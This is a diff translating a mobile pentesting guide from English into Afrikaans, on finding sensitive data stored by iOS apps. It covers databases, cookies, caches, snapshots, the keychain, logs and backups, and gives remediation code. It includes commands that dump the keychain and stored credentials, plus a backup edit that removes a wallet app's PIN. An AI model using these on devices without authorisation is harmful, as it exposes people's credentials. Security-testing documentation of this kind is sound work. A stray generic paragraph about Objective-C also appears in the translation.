Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is 'n raamwerk vir die bestuur van die model-laag van voorwerpe in jou aansoek. [Core Data kan SQLite gebruik as sy volhoubare stoor](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), maar die raamwerk self is nie 'n databasis nie.\ +CoreData enkripteer nie sy data standaard nie. 'n Bykomende enkripsie-laag kan egter by CoreData gevoeg word. 
Sien die [GitHub Repo](https://github.com/project-imas/encrypted-core-data) vir meer besonderhede. -You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` +Jy kan die SQLite Core Data-inligting van 'n aansoek vind in die pad `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` -**If you can open the SQLite and access sensitive information, then you found a miss-configuration.** +**As jy die SQLite kan oopmaak en toegang tot sensitiewe inligting kan verkry, het jy 'n verkeerde konfigurasie gevind.** -{% code title="Code from iGoat" %} +{% code title="Kode van iGoat" %} ```objectivec -(void)storeDetails { - AppDelegate * appDelegate = (AppDelegate *)(UIApplication.sharedApplication.delegate); +AppDelegate * appDelegate = (AppDelegate *)(UIApplication.sharedApplication.delegate); - NSManagedObjectContext *context =[appDelegate managedObjectContext]; +NSManagedObjectContext *context =[appDelegate managedObjectContext]; - User *user = [self fetchUser]; - if (user) { - return; - } - user = [NSEntityDescription insertNewObjectForEntityForName:@"User" - inManagedObjectContext:context]; - user.email = CoreDataEmail; - user.password = CoreDataPassword; - NSError *error; - if (![context save:&error]) { - NSLog(@"Error in saving data: %@", [error localizedDescription]); +User *user = [self fetchUser]; +if (user) { +return; +} +user = [NSEntityDescription insertNewObjectForEntityForName:@"User" +inManagedObjectContext:context]; +user.email = CoreDataEmail; +user.password = CoreDataPassword; +NSError *error; +if (![context save:&error]) { +NSLog(@"Error in saving data: %@", [error localizedDescription]); - }else{ - NSLog(@"data stored in core data"); - } +}else{ +NSLog(@"data stored in core data"); +} } ``` {% endcode %} ### YapDatabase -[YapDatabase](https://github.com/yapstudios/YapDatabase) is a key/value store built on top of SQLite.\ 
-As the Yap databases are sqlite databases you can find them using the purposed commend in the previous section. +[YapDatabase](https://github.com/yapstudios/YapDatabase) is 'n sleutel/waarde-stoor wat gebou is op SQLite.\ +Aangesien die Yap-databasis sqlite-databasisse is, kan jy hulle vind deur die voorgestelde opdrag in die vorige afdeling te gebruik. -### Other SQLite Databases - -It's common for applications to create their own sqlite database. They may be **storing** **sensitive** **data** on them and leaving it unencrypted. Therefore, it's always interesting to check every database inside the applications directory. Therefore go to the application directory where the data is saved (`/private/var/mobile/Containers/Data/Application/{APPID}`) +### Ander SQLite-databasisse +Dit is algemeen vir programme om hul eie sqlite-databasis te skep. Hulle kan **sensitiewe** **data** daarop **berg** en dit onversleuteld agterlaat. Daarom is dit altyd interessant om elke databasis binne die toepassingsgids te ondersoek. Gaan dus na die toepassingsgids waar die data gestoor word (`/private/var/mobile/Containers/Data/Application/{APPID}`) ```bash find ./ -name "*.sqlite" -or -name "*.db" ``` +### Firebase Real-Time Databasis -### Firebase Real-Time Databases +Ontwikkelaars kan data stoor en sinchroniseer binne 'n NoSQL-wolk-gehoste databasis deur middel van Firebase Real-Time Databasisse. Die data word in JSON-formaat gestoor en word in werklike tyd gesinchroniseer na alle gekoppelde kliënte. -Developers are enabled to **store and sync data** within a **NoSQL cloud-hosted database** through Firebase Real-Time Databases. Stored in JSON format, the data gets synchronized to all connected clients in real time. 
- -You can find how to check for misconfigured Firebase databases here: +Jy kan hier vind hoe om vir verkeerd gekonfigureerde Firebase databasisse te kyk: {% content-ref url="../../network-services-pentesting/pentesting-web/buckets/firebase-database.md" %} [firebase-database.md](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md) {% endcontent-ref %} -### Realm databases +### Realm databasisse -[Realm Objective-C](https://realm.io/docs/objc/latest/) and [Realm Swift](https://realm.io/docs/swift/latest/) offer a powerful alternative for data storage, not provided by Apple. By default, they **store data unencrypted**, with encryption available through specific configuration. - -The databases are located at: `/private/var/mobile/Containers/Data/Application/{APPID}`. To explore these files, one can utilize commands like: +[Realm Objective-C](https://realm.io/docs/objc/latest/) en [Realm Swift](https://realm.io/docs/swift/latest/) bied 'n kragtige alternatief vir data-opberging wat nie deur Apple voorsien word nie. Standaard stoor hulle data onversleutel, met versleuteling beskikbaar deur spesifieke konfigurasie. +Die databasisse is geleë by: `/private/var/mobile/Containers/Data/Application/{APPID}`. Om hierdie lêers te verken, kan mens opdragte soos die volgende gebruik: ```bash iPhone:/private/var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents root# ls default.realm default.realm.lock default.realm.management/ default.realm.note| $ find ./ -name "*.realm*" ``` +Om hierdie databasislêers te sien, word die [**Realm Studio**](https://github.com/realm/realm-studio) hulpmiddel aanbeveel. -For viewing these database files, the [**Realm Studio**](https://github.com/realm/realm-studio) tool is recommended. 
- -To implement encryption within a Realm database, the following code snippet can be used: - +Om versleuteling binne 'n Realm-databasis te implementeer, kan die volgende kodefragment gebruik word: ```swift // Open the encrypted Realm file where getKey() is a method to obtain a key from the Keychain or a server let config = Realm.Configuration(encryptionKey: getKey()) do { - let realm = try Realm(configuration: config) - // Use the Realm as normal +let realm = try Realm(configuration: config) +// Use the Realm as normal } catch let error as NSError { - // If the encryption key is wrong, `error` will say that it's an invalid database - fatalError("Error opening realm: \(error)") +// If the encryption key is wrong, `error` will say that it's an invalid database +fatalError("Error opening realm: \(error)") } ``` +### Couchbase Lite Databasis -### Couchbase Lite Databases - -[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) is described as a **lightweight** and **embedded** database engine that follows the **document-oriented** (NoSQL) approach. Designed to be native to **iOS** and **macOS**, it offers the capability to sync data seamlessly. - -To identify potential Couchbase databases on a device, the following directory should be inspected: +[Couchbase Lite](https://github.com/couchbase/couchbase-lite-ios) word beskryf as 'n **liggewig** en **ingebedde** databasis-enjin wat die **dokumentgeoriënteerde** (NoSQL) benadering volg. Dit is ontwerp om inheems te wees aan **iOS** en **macOS**, en bied die vermoë om data naadloos te sinchroniseer. +Om potensiële Couchbase-databasisse op 'n toestel te identifiseer, moet die volgende gids ondersoek word: ```bash ls /private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support/ ``` +### Koekies -### Cookies - -iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. 
However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**. - -To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) or use objection's **`ios cookies get`.**\ -**You can also use objection to** convert these files to a JSON format and inspect the data. +iOS stoor die koekies van die programme in die **`Library/Cookies/cookies.binarycookies`** binne elke program se vouer. Ontwikkelaars besluit egter soms om hulle in die **sleutelketting** te stoor, aangesien die genoemde **koekie-lêer in rugsteun toeganklik is**. +Om die koekie-lêer te ondersoek, kan jy [**hierdie Python-skripsie**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) gebruik of gebruik maak van objection se **`ios cookies get`.**\ +**Jy kan ook objection gebruik om hierdie lêers na 'n JSON-formaat te omskep en die data te ondersoek.** ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json [ - { - "domain": "highaltitudehacks.com", - "expiresDate": "2051-09-15 07:46:43 +0000", - "isHTTPOnly": "false", - "isSecure": "false", - "name": "username", - "path": "/", - "value": "admin123", - "version": "0" - } +{ +"domain": "highaltitudehacks.com", +"expiresDate": "2051-09-15 07:46:43 +0000", +"isHTTPOnly": "false", +"isSecure": "false", +"name": "username", +"path": "/", +"value": "admin123", +"version": "0" +} ] ``` - ### Cache -By default NSURLSession stores data, such as **HTTP requests and responses in the Cache.db** database. This database can contain **sensitive data**, if tokens, usernames or any other sensitive information has been cached. To find the cached information open the data directory of the app (`/var/mobile/Containers/Data/Application/`) and go to `/Library/Caches/`. The **WebKit cache is also being stored in the Cache.db** file. 
**Objection** can open and interact with the database with the command `sqlite connect Cache.db`, as it is a n**ormal SQLite database**. +Standaard stoor NSURLSession data, soos **HTTP-aanvrae en -antwoorde in die Cache.db** databasis. Hierdie databasis kan **sensitiewe data** bevat, as tokens, gebruikersname of enige ander sensitiewe inligting gestoor is. Om die gestoorde inligting te vind, open die data-gids van die app (`/var/mobile/Containers/Data/Application/`) en gaan na `/Library/Caches/`. Die **WebKit-cache word ook in die Cache.db**-lêer gestoor. **Objection** kan die databasis oopmaak en daarmee interaksie hê met die opdrag `sqlite connect Cache.db`, aangesien dit 'n **normale SQLite-databasis** is. -It is **recommended to disable Caching this data**, as it may contain sensitive information in the request or response. The following list below shows different ways of achieving this: +Dit word **aanbeveel om hierdie data se caching uit te skakel**, aangesien dit sensitiewe inligting in die versoek of antwoord kan bevat. Die volgende lys toon verskillende maniere om dit te bereik: -1. It is recommended to remove Cached responses after logout. This can be done with the provided method by Apple called [`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses) You can call this method as follows: +1. Dit word aanbeveel om gestoorde antwoorde te verwyder na afmelding. Dit kan gedoen word met die metode wat deur Apple voorsien word, genaamd [`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses). Jy kan hierdie metode so oproep: - `URLCache.shared.removeAllCachedResponses()` +`URLCache.shared.removeAllCachedResponses()` - This method will remove all cached requests and responses from Cache.db file. -2. 
If you don't need to use the advantage of cookies it would be recommended to just use the [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) configuration property of URLSession, which will disable saving cookies and Caches. +Hierdie metode sal alle gestoorde versoek en antwoorde uit die Cache.db-lêer verwyder. +2. As jy nie die voordeel van koekies hoef te gebruik nie, word dit aanbeveel om net die [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) konfigurasie-eienskap van URLSession te gebruik, wat die stoor van koekies en Cache uitskakel. - [Apple documentation](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral): +[Apple-dokumentasie](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral): - `An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesn’t store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.` -3. Cache can be also disabled by setting the Cache Policy to [.notAllowed](https://developer.apple.com/documentation/foundation/urlcache/storagepolicy/notallowed). It will disable storing Cache in any fashion, either in memory or on disk. +`'n Ephemeral-sessiekonfigurasie-objek is soortgelyk aan 'n verstek-sessiekonfigurasie (sien verstek), behalwe dat die ooreenstemmende sessie-objek nie Cache, geloofsbriewestoorplekke of enige sessie-verwante data na skyf stoor nie. In plaas daarvan word sessie-verwante data in RAM gestoor. Die enigste keer wat 'n ephemeral-sessie data na skyf skryf, is wanneer jy dit sê om die inhoud van 'n URL na 'n lêer te skryf.` +3. 
Cache kan ook uitgeskakel word deur die Cache-beleid in te stel op [.notAllowed](https://developer.apple.com/documentation/foundation/urlcache/storagepolicy/notallowed). Dit sal die stoor van Cache in enige vorm, hetsy in geheue of op skyf, uitskakel. ### Snapshots -Whenever you press the home button, iOS **takes a snapshot of the current screen** to be able to do the transition to the application on a much smoother way. However, if **sensitive** **data** is present in the current screen, it will be **saved** in the **image** (which **persists** **across** **reboots**). These are the snapshots that you can also access double tapping the home screen to switch between apps. +Telkens as jy die tuisknoppie druk, neem iOS **'n skermafdruk van die huidige skerm** om die oorgang na die toepassing baie vlotter te maak. As daar egter **sensitiewe data** in die huidige skerm is, sal dit in die **beeld gestoor word** (wat **oorleef** **herlaaiings**). Dit is die skermafdrukke wat jy ook kan toegang deur dubbel te tik op die tuisskerm om tussen programme te skakel. -Unless the iPhone is jailbroken, the **attacker** needs to have **access** to the **device** **unblocked** to see these screenshots. By default the last snapshot is stored in the application's sandbox in `Library/Caches/Snapshots/` or `Library/SplashBoard/Snapshots` folder (the trusted computers can' t access the filesystem from iOX 7.0). +Tensy die iPhone gejailbreak is, moet die **aanvaller** toegang tot die **ontgrendelde toestel** hê om hierdie skermafdrukke te sien. Standaard word die laaste skermafdruk gestoor in die toepassing se sandput in die `Library/Caches/Snapshots/` of `Library/SplashBoard/Snapshots`-gids (vertroude rekenaars kan nie die lêersisteem vanaf iOS 7.0 toegang nie). -Once way to prevent this bad behaviour is to put a blank screen or remove the sensitive data before taking the snapshot using the `ApplicationDidEnterBackground()` function. 
+Een manier om hierdie slegte gedrag te voorkom, is om 'n leë skerm te plaas of die sensitiewe data te verwyder voordat die skermafdruk geneem word deur die `ApplicationDidEnterBackground()`-funksie te gebruik. -The following is a sample remediation method that will set a default screenshot. +Die volgende is 'n voorbeeld van 'n herstelmetode wat 'n verstekskermafdruk sal instel. Swift: - ```swift private var backgroundImage: UIImageView? func applicationDidEnterBackground(_ application: UIApplication) { - let myBanner = UIImageView(image: #imageLiteral(resourceName: "overlayImage")) - myBanner.frame = UIScreen.main.bounds - backgroundImage = myBanner - window?.addSubview(myBanner) +let myBanner = UIImageView(image: #imageLiteral(resourceName: "overlayImage")) +myBanner.frame = UIScreen.main.bounds +backgroundImage = myBanner +window?.addSubview(myBanner) } func applicationWillEnterForeground(_ application: UIApplication) { - backgroundImage?.removeFromSuperview() +backgroundImage?.removeFromSuperview() } ``` - Objective-C: +Objective-C is 'n objekgeoriënteerde programmeertaal wat gebruik word vir die ontwikkeling van iOS-toepassings. Dit is 'n uitbreiding van die C-programmeertaal en voeg 'n stel objekgeoriënteerde funksies en sintaksis by. Objective-C is die primêre programmeertaal wat gebruik word vir die ontwikkeling van iOS-toepassings voordat Swift bekend gestel is. + +Objective-C is 'n kragtige taal wat 'n groot verskeidenheid funksies en biblioteke bied vir die ontwikkeling van iOS-toepassings. Dit maak gebruik van 'n sintaksis wat bekend staan as "message passing" om met objekte te kommunikeer. Hierdie sintaksis maak dit moontlik om metode-oproepe na objekte te maak en data tussen objekte te stuur. + +Objective-C bied ook 'n sterk refleksie-meganisme wat dit moontlik maak om objekte te ondersoek en te manipuleer tydens uitvoering. Hierdie refleksie-meganisme kan gebruik word vir gevorderde tegnieke soos swak punte-ontleding en dinamiese kode-generering. 
+ +As jy belangstel in die ontwikkeling van iOS-toepassings, is dit belangrik om 'n goeie begrip van Objective-C te hê. Dit sal jou help om die iOS-raamwerk en biblioteke te verstaan en om effektiewe en kragtige toepassings te ontwikkel. ``` @property (UIImageView *)backgroundImage; - (void)applicationDidEnterBackground:(UIApplication *)application { - UIImageView *myBanner = [[UIImageView alloc] initWithImage:@"overlayImage.png"]; - self.backgroundImage = myBanner; - self.backgroundImage.bounds = UIScreen.mainScreen.bounds; - [self.window addSubview:myBanner]; +UIImageView *myBanner = [[UIImageView alloc] initWithImage:@"overlayImage.png"]; +self.backgroundImage = myBanner; +self.backgroundImage.bounds = UIScreen.mainScreen.bounds; +[self.window addSubview:myBanner]; } - (void)applicationWillEnterForeground:(UIApplication *)application { - [self.backgroundImage removeFromSuperview]; +[self.backgroundImage removeFromSuperview]; } ``` +Hierdie stel die agtergrondbeeld na `overlayImage.png` wanneer die toepassing agtergrond toegepas word. Dit voorkom dat sensitiewe data uitlek omdat `overlayImage.png` altyd die huidige aansig sal oorskryf. -This sets the background image to `overlayImage.png` whenever the application is backgrounded. It prevents sensitive data leaks because `overlayImage.png` will always override the current view. +### Sleutelbos -### Keychain +Vir toegang tot en bestuur van die iOS-sleutelbos, is daar gereedskap soos [**Keychain-Dumper**](https://github.com/ptoomey3/Keychain-Dumper) beskikbaar, wat geskik is vir gejailbreakte toestelle. Daarbenewens bied [**Objection**](https://github.com/sensepost/objection) die opdrag `ios keychain dump` vir soortgelyke doeleindes. -For accessing and managing the iOS keychain, tools like [**Keychain-Dumper**](https://github.com/ptoomey3/Keychain-Dumper) are available, suitable for jailbroken devices. 
Additionally, [**Objection**](https://github.com/sensepost/objection) provides the command `ios keychain dump` for similar purposes. - -#### **Storing Credentials** - -The **NSURLCredential** class is ideal for saving sensitive information directly in the keychain, bypassing the need for NSUserDefaults or other wrappers. To store credentials after login, the following Swift code is used: +#### **Bewaring van Geldele** +Die **NSURLCredential**-klas is ideaal vir die stoor van sensitiewe inligting direk in die sleutelbos, sonder die behoefte aan NSUserDefaults of ander omhulsels. Om geldele na aanmelding te stoor, word die volgende Swift-kode gebruik: ```swift NSURLCredential *credential; credential = [NSURLCredential credentialWithUser:username password:password persistence:NSURLCredentialPersistencePermanent]; [[NSURLCredentialStorage sharedCredentialStorage] setCredential:credential forProtectionSpace:self.loginProtectionSpace]; ``` +Om hierdie gestoorde geloofsbriewe te onttrek, word die bevel `ios nsurlcredentialstorage dump` van Objection gebruik. -To extract these stored credentials, Objection's command `ios nsurlcredentialstorage dump` is utilized. +## **Aangepaste Sleutelborde en Sleutelbord Cache** -## **Custom Keyboards and Keyboard Cache** +Met iOS 8.0 en later kan gebruikers aangepaste sleutelborduitbreidings installeer, wat bestuurbaar is onder **Instellings > Algemeen > Sleutelbord > Sleutelborde**. Terwyl hierdie sleutelborde uitgebreide funksionaliteit bied, stel dit 'n risiko van sleutelbordlogboekinskrywing en die oordra van data na eksterne bedieners, alhoewel gebruikers in kennis gestel word van sleutelborde wat netwerktoegang vereis. Apps kan, en moet, die gebruik van aangepaste sleutelborde vir sensitiewe inligting beperk. -With iOS 8.0 onwards, users can install custom keyboard extensions, which are manageable under **Settings > General > Keyboard > Keyboards**. 
While these keyboards offer extended functionality, they pose a risk of keystroke logging and transmitting data to external servers, though users are notified about keyboards requiring network access. Apps can, and should, restrict the use of custom keyboards for sensitive information entry. +**Veiligheidsaanbevelings:** +- Dit word aanbeveel om derdeparty-sleutelborde te deaktiveer vir verbeterde veiligheid. +- Wees bewus van die outokorreksie en outo-voorstel funksies van die verstek iOS-sleutelbord, wat sensitiewe inligting in kaslêers wat in `Library/Keyboard/{locale}-dynamic-text.dat` of `/private/var/mobile/Library/Keyboard/dynamic-text.dat` geleë is, kan stoor. Hierdie kaslêers moet gereeld nagegaan word vir sensitiewe data. Dit word aanbeveel om die sleutelbordwoordeboek te herstel via **Instellings > Algemeen > Herstel > Herstel Sleutelbordwoordeboek** om gekasheerde data te skoonmaak. +- Die onderskepping van netwerkverkeer kan onthul of 'n aangepaste sleutelbord sleutelinskrywings op afstand oordra. -**Security Recommendations:** -- It's advised to disable third-party keyboards for enhanced security. -- Be aware of the autocorrect and auto-suggestions features of the default iOS keyboard, which could store sensitive information in cache files located in `Library/Keyboard/{locale}-dynamic-text.dat` or `/private/var/mobile/Library/Keyboard/dynamic-text.dat`. These cache files should be regularly checked for sensitive data. Resetting the keyboard dictionary via **Settings > General > Reset > Reset Keyboard Dictionary** is recommended for clearing cached data. -- Intercepting network traffic can reveal whether a custom keyboard is transmitting keystrokes remotely. - -### **Preventing Text Field Caching** - -The [UITextInputTraits protocol](https://developer.apple.com/reference/uikit/uitextinputtraits) offers properties to manage autocorrection and secure text entry, essential for preventing sensitive information caching. 
For example, disabling autocorrection and enabling secure text entry can be achieved with: +### **Voorkoming van Teksveldkasgebruik** +Die [UITextInputTraits-protokol](https://developer.apple.com/reference/uikit/uitextinputtraits) bied eienskappe om outokorreksie en veilige teksinskrywing te bestuur, wat noodsaaklik is vir die voorkoming van die kasgebruik van sensitiewe inligting. Byvoorbeeld, die deaktivering van outokorreksie en die aktivering van veilige teksinskrywing kan bereik word met: ```objectivec textObject.autocorrectionType = UITextAutocorrectionTypeNo; textObject.secureTextEntry = YES; ``` - -Additionally, developers should ensure that text fields, especially those for entering sensitive information like passwords and PINs, disable caching by setting `autocorrectionType` to `UITextAutocorrectionTypeNo` and `secureTextEntry` to `YES`. - +Daarbenewens moet ontwikkelaars verseker dat teksvelde, veral dié vir die invoer van sensitiewe inligting soos wagwoorde en PIN-kodes, die gebruik van 'n cache deaktiveer deur `autocorrectionType` in te stel op `UITextAutocorrectionTypeNo` en `secureTextEntry` op `YES`. ```objectivec UITextField *textField = [[UITextField alloc] initWithFrame:frame]; textField.autocorrectionType = UITextAutocorrectionTypeNo; ``` - ## **Logs** -Debugging code often involves the use of **logging**. There's a risk involved as **logs may contain sensitive information**. Previously, in iOS 6 and earlier versions, logs were accessible to all apps, posing a risk of sensitive data leakage. **Now, applications are restricted to accessing only their logs**. +Foutopsporingskode behels dikwels die gebruik van **logging**. Daar is 'n risiko betrokke aangesien **logs sensitiewe inligting kan bevat**. Voorheen, in iOS 6 en vorige weergawes, was logs toeganklik vir alle programme, wat 'n risiko van lekkasie van sensitiewe data inhou. **Nou is programme beperk tot toegang tot slegs hul eie logs**. 
-Despite these restrictions, an **attacker with physical access** to an unlocked device can still exploit this by connecting the device to a computer and **reading the logs**. It is important to note that logs remain on the disk even after the app's uninstallation. +Ten spyte van hierdie beperkings kan 'n **aanvaller met fisiese toegang** tot 'n ontgrendelde toestel dit steeds uitbuit deur die toestel aan 'n rekenaar te koppel en die logs te lees. Dit is belangrik om daarop te let dat logs op die skyf bly selfs nadat die toepassing gedeïnstalleer is. -To mitigate risks, it is advised to **thoroughly interact with the app**, exploring all its functionalities and inputs to ensure no sensitive information is being logged inadvertently. +Om risiko's te verminder, word dit aanbeveel om **deeglik met die toepassing te interaksieer**, deur al sy funksionaliteite en insette te verken om te verseker dat geen sensitiewe inligting onbedoeld geregistreer word nie. -When reviewing the app's source code for potential leaks, look for both **predefined** and **custom logging statements** using keywords such as `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` for built-in functions, and any mentions of `Logging` or `Logfile` for custom implementations. +Wanneer jy die bronkode van die toepassing ondersoek vir potensiële lekke, soek na beide **voorgedefinieerde** en **aangepaste loggingverklarings** met sleutelwoorde soos `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` vir ingeboude funksies, en enige verwysings na `Logging` of `Logfile` vir aangepaste implementasies. -### **Monitoring System Logs** - -Apps log various pieces of information which can be sensitive. To monitor these logs, tools and commands like: +### **Monitering van Stelsellogs** +Toepassings registreer verskeie stukke inligting wat sensitief kan wees. 
Om hierdie logs te monitor, kan gereedskap en opdragte soos: ```bash idevice_id --list # To find the device ID idevicesyslog -u (| grep ) # To capture the device logs ``` +is nuttig. Daarbenewens bied **Xcode** 'n manier om konsole-logboeke te versamel: -are useful. Additionally, **Xcode** provides a way to collect console logs: - -1. Open Xcode. -2. Connect the iOS device. -3. Navigate to **Window** -> **Devices and Simulators**. -4. Select your device. -5. Trigger the issue you're investigating. -6. Use the **Open Console** button to view logs in a new window. - -For more advanced logging, connecting to the device shell and using **socat** can provide real-time log monitoring: +1. Maak Xcode oop. +2. Verbind die iOS-toestel. +3. Navigeer na **Window** -> **Devices and Simulators**. +4. Kies jou toestel. +5. Trigger die probleem wat jy ondersoek. +6. Gebruik die **Open Console**-knoppie om logboeke in 'n nuwe venster te sien. +Vir meer gevorderde logboekhouding kan die verbind van die toestel se skulp en die gebruik van **socat** werkliktyd-logmonitoring bied: ```bash iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock ``` - -Followed by commands to observe log activities, which can be invaluable for diagnosing issues or identifying potential data leakage in logs. +Gevolg deur bevele om logaktiwiteite waar te neem, wat van onschatbare waarde kan wees vir die diagnose van probleme of die identifisering van potensiële datalekke in logboeke. *** @@ -717,58 +675,55 @@ Followed by commands to observe log activities, which can be invaluable for diag
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Backups +## Agteruitkopieë -**Auto-backup features** are integrated into iOS, facilitating the creation of device data copies through iTunes (up to macOS Catalina), Finder (from macOS Catalina onward), or iCloud. These backups encompass almost all device data, excluding highly sensitive elements like Apple Pay details and Touch ID configurations. +**Outomatiese agteruitkopieë** is geïntegreer in iOS, wat die skep van toesteldata-afskrifte fasiliteer deur middel van iTunes (tot macOS Catalina), Finder (vanaf macOS Catalina voort) of iCloud. Hierdie agteruitkopieë dek byna alle toesteldata, met uitsondering van hoogs sensitiewe elemente soos Apple Pay besonderhede en Touch ID konfigurasies. -### Security Risks +### Sekuriteitsrisiko's -The inclusion of **installed apps and their data** in backups raises the issue of potential **data leakage** and the risk that **backup modifications could alter app functionality**. It's advised to **not store sensitive information in plaintext** within any app's directory or its subdirectories to mitigate these risks. +Die insluiting van **geïnstalleerde programme en hul data** in agteruitkopieë bring die kwessie van potensiële **datalekke** na vore en die risiko dat **agteruitkopiewysigings programme se funksionaliteit kan verander**. 
Dit word aanbeveel om **sensitiewe inligting nie in plain text** binne enige program se gids of subgidse te stoor nie om hierdie risiko's te verminder. -### Excluding Files from Backups +### Uitsluiting van lêers uit agteruitkopieë -Files in `Documents/` and `Library/Application Support/` are backed up by default. Developers can exclude specific files or directories from backups using `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey`. This practice is crucial for protecting sensitive data from being included in backups. +Lêers in `Documents/` en `Library/Application Support/` word standaard agteruitgekopieer. Ontwikkelaars kan spesifieke lêers of gidse uitsluit van agteruitkopieë deur gebruik te maak van `NSURL setResourceValue:forKey:error:` met die `NSURLIsExcludedFromBackupKey`. Hierdie praktyk is noodsaaklik om sensitiewe data te beskerm teen insluiting in agteruitkopieë. -### Testing for Vulnerabilities +### Toetsing vir kwesbaarhede -To assess an app's backup security, start by **creating a backup** using Finder, then locate it using guidance from [Apple's official documentation](https://support.apple.com/en-us/HT204215). Analyze the backup for sensitive data or configurations that could be altered to affect app behavior. - -Sensitive information can be sought out using command-line tools or applications like [iMazing](https://imazing.com). For encrypted backups, the presence of encryption can be confirmed by checking the "IsEncrypted" key in the "Manifest.plist" file at the backup's root. +Om die agteruitkopie-sekuriteit van 'n program te assesseer, begin deur 'n agteruitkopie te skep met behulp van Finder, en vind dit dan met behulp van die riglyne van [Apple se amptelike dokumentasie](https://support.apple.com/en-us/HT204215). Analiseer die agteruitkopie vir sensitiewe data of konfigurasies wat gewysig kan word om die program se gedrag te beïnvloed. 
+Sensitiewe inligting kan opgespoor word met behulp van opdraglyninstrumente of toepassings soos [iMazing](https://imazing.com). Vir geënkripteerde agteruitkopieë kan die teenwoordigheid van enkripsie bevestig word deur die "IsEncrypted" sleutel in die "Manifest.plist" lêer by die agteruitkopie se hoof te kontroleer. ```xml ... - Date - 2021-03-12T17:43:33Z - IsEncrypted - +Date +2021-03-12T17:43:33Z +IsEncrypted + ... ``` +Vir die hanteer van versleutelde rugsteun, kan Python-skripte beskikbaar in [DinoSec se GitHub-opberging](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), soos **backup_tool.py** en **backup_passwd.py**, nuttig wees, alhoewel dit moontlik aanpassings mag vereis vir die verenigbaarheid met die nuutste iTunes/Finder-weergawes. Die [**iOSbackup**-hulpmiddel](https://pypi.org/project/iOSbackup/) is 'n ander opsie vir toegang tot lêers binne wagwoord-beskermde rugsteun. -For dealing with encrypted backups, Python scripts available in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), like **backup_tool.py** and **backup_passwd.py**, may be useful, albeit potentially requiring adjustments for compatibility with the latest iTunes/Finder versions. The [**iOSbackup** tool](https://pypi.org/project/iOSbackup/) is another option for accessing files within password-protected backups. +### Wysiging van App-gedrag -### Modifying App Behavior +'n Voorbeeld van die wysiging van app-gedrag deur middel van rugsteun-wysigings word gedemonstreer in die [Bither bitcoin-bewaarbeurs-app](https://github.com/bither/bither-ios), waar die UI-sluitpenkode binne `net.bither.plist` onder die **pin_code**-sleutel gestoor word. Die verwydering van hierdie sleutel uit die plist en die herstel van die rugsteun verwyder die PIN-vereiste en bied onbeperkte toegang. 
-An example of altering app behavior through backup modifications is demonstrated in the [Bither bitcoin wallet app](https://github.com/bither/bither-ios), where the UI lock PIN is stored within `net.bither.plist` under the **pin_code** key. Removing this key from the plist and restoring the backup removes the PIN requirement, providing unrestricted access. +## Opsomming van Geheuetoetsing vir Sensitiewe Data -## Summary on Memory Testing for Sensitive Data +Wanneer dit kom by die hantering van sensitiewe inligting wat in 'n toepassing se geheue gestoor word, is dit noodsaaklik om die blootstellingsduur van hierdie data te beperk. Daar is twee primêre benaderings om geheue-inhoud te ondersoek: **die skep van 'n geheue-dump** en **die analise van die geheue in werklike tyd**. Beide metodes het hul uitdagings, insluitend die potensiaal om kritieke data tydens die dump-proses of analise te mis. -When dealing with sensitive information stored in an application's memory, it is crucial to limit the exposure time of this data. There are two primary approaches to investigate memory content: **creating a memory dump** and **analyzing the memory in real time**. Both methods have their challenges, including the potential to miss critical data during the dump process or analysis. +## **Ophaling en Analise van 'n Geheue-dump** -## **Retrieving and Analyzing a Memory Dump** - -For both jailbroken and non-jailbroken devices, tools like [objection](https://github.com/sensepost/objection) and [Fridump](https://github.com/Nightbringer21/fridump) allow for the dumping of an app's process memory. Once dumped, analyzing this data requires various tools, depending on the nature of the information you're searching for. 
